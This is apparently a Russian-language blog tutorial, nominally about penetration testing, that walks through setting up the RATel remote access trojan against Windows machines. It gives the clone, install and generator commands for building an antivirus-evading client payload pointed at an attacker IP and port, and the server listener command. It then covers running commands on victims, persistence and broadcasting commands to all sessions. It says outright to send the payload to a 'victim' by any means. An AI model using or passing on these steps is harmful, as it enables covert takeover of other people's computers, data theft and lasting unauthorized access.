RATel: создаём RAT для Windows

RATel: создаём RAT для Windows

Этичный Хакер

Сегодня в этом уроке мы расскажем вам о другом инструменте тестирования на проникновение под названием “RAT-el“. Это инструмент с открытым исходным кодом, который позволяет вам получить контроль над компьютером с Windows. Он работает по модели клиент-сервер, сервер отправляет команды, а клиент выполняет команды и отправляет результат обратно на сервер. Клиент полностью не обнаруживается антивирусным программным обеспечением. 

Зависимости

Как всегда, на этот раз нам также необходимо установить некоторые зависимости перед установкой этого инструмента.

sudo apt-get install git python3 python3-pip mingw-w64

Прежде всего, вы должны загрузить проект этого инструмента с помощью команды git из GitHub. После этого вам нужно перейти в каталог “setup” этого инструмента с помощью команды cd и, наконец, выполнить команду “pip”, чтобы установить остальные зависимости.

git clone https://github.com/FrenchCisco/RATel
cd RATel/setup
pip3 install -r requirement.txt

Настройка клиента

Нам придется вернуться к основному каталогу этого инструмента. Теперь вам нужно изменить IP-адрес, номер порта и имя этого инструмента в соответствии с вашими предпочтениями.

cd RATel
python3 RATelGenerator.py --port 12345 --ip 192.168.1.12 --name ratel.exe --password secnhack

После создания полезной нагрузки полезная нагрузка будет сохранена в каталоге “полезная нагрузка”. Теперь вы можете поделиться им с жертвой, используя любые онлайн- или офлайн-сервисы.

cd payload/

Защитник Windows

Посмотрите ниже, защита защитника Windows включена.

Настройка сервера

Вернитесь к своей основной машине kali Linux и настройте сервер для записи клиентского сеанса. Теперь соединение будет установлено, как только жертва нажмет на вредоносный клиентский сервис.

cd RATel/server
python3 RATelServer.py --port 12345 --password 12345 --time 5 --clean

Мы понятия не имеем, что именно нам нужно сделать после получения сеанса, поэтому мы выполним команду “-h”, чтобы увидеть все команды.

Сеанс списка

Вы можете просмотреть все установленные сеансы, используя команду “-ls”.

Выполните команду, просто выбрав цель и ее идентификатор сеанса. Теперь мы получили полный контроль над целевой системой. После этого мы выполним команду “-h”, чтобы снова увидеть ее использование.

Использование

 -target <ИДЕНТИФИКАТОР>

Выполнить команду

Теперь мы можем выполнять все команды, связанные с командной строкой, в целевой системе, используя параметр “-c”.

Активировать командную строку

Также вы можете активировать CMD-приглашение, выполнив следующую команду.

Настойчивость

Модуль сохранения загружается во время запуска Windows, который мы также можем создать.

Трансляция

У него есть еще одна функция, с помощью которой мы можем транслировать любое сообщение одновременно на все действующие сеансы. Как вы можете видеть на изображении ниже, мы распространили сообщение об открытии проводника в каждой системе.

--broadcast
-c "explorer.exe "

Как вы можете видеть, запрос проводника активирован в каждой системе, что означает, что он работает отлично.






Report Page